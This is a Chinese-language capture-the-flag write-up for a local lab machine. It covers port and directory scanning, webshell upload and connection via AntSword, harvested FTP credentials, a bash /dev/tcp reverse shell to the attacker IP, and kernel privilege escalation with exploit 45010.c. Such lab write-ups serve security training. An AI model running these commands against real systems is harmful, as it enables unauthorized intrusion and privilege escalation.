一、信息收集
kali ip:192.168.48.131
靶机 ip:192.168.48.148
(1)查找kali ip
(2)查找靶机ip
rp-scan -l 发现不存在,得自己手动配置ip
(3)手动配置ip方法:
开启靶机按e进入安全模式
找到 ro 替换为 rw signie init=/bin/bash
按ctrl+x进入bash
输入指令ip a
查看当前网卡,除lo外的,记住名字。ens33
修改网卡配置信息
首先查看/etc/network/文件目录下是否有interfacers文件:ls /etc/network
如果有,则所下载靶机版本较低可通过修改interfacers文件连接网络
编辑文件interfacers: vi /etc/network/interfaces
大写ZZ 保存退出
重启网卡:
/etc/init.d/networking restart
重启靶机:
这样就可以扫出来了
二、扫描
(1)端口扫描
nmap -sS -A -p- 192.168.48.148
有21 、80端口 访问80端口
我们发现了index of / :说明这是一个目录索引,我们挨个点进去看看能不能发现点有用的东西
(2)目录扫描
dirb http://192.168.48.148
我们把能点的地方都点点,最后我们点到Buscar时发现:
http://192.168.13.140/site/busque.php?buscar=
这个页面虽然是空白页面,但是上方的urL地址栏里有?buscar= 这不是意味着我们可以传参数了?所以,我们试试传点参数,看看页面有没有回显或者变化.我们传个id进去试试他把咱们传的id带进来了,说明这里没有对我们传入的参数进行限制,那我们就可以传入比如一句话木马了
三、蚁剑连接
(1)传木马
(2)蚁剑连接
url:http://192.168.48.148/site/shell.php
密码:cmd
我们进到wordpress目录下的/config.php文件,看到了敏感信息
接着我们又在html/.backup目录下发现了敏感信息.
这里我们在kali上用我们得到的的用户名jangow01 密码:abygurl69去登录ftp,发现登录成功.
ftp 192.168.48.148
四、反弹shell
(1)kali开启监听
在kali上开启监听 端口的话用443,因为靶机只能用443端口
nc -lvvp 443
(2)打开终端
bash -c 'bash -i >& /dev/tcp/192.168.48.131/443 0>&1'
讲一下这里的bash -c ,我们在蚁剑打开靶机终端的时候,不是标准的shell环境,bash命令是运行不了的,所以要加上bash -c,其是以命令处理语句。
成功反弹shell
五、提权
(1)查信息
当前权限为 www-data 的低权限账户需要我们提权至Root账户...再此查看其内核与发行版本
uname -a
lsb_release -a
通过以上信息收集可发现 内核版本为 4.4.0-31且 发行版本为 Ubuntu16.04这里利用kali攻
击机上的 searchsploit 工具搜索下其提权漏洞信息...
searchsploit ubuntu 4.4.0-31
searchsploit ubuntu 16.04
这里选择 45010.c 这个提权程序进行尝试....执行以下命令将其 .c 文件进行下载并编译成二
进制文件...
(2)下载提权脚本
searchsploit -m 45010.c
(3)提权
使用蚁剑上传提权文件并在反弹回来的Shell上执行编译操作并执行....提权成功
gcc 45010.c
chmod +x a.out //chmod 改变权限 +- r w x
./a.out
(4)查flag
进入/root目录获取其Flag....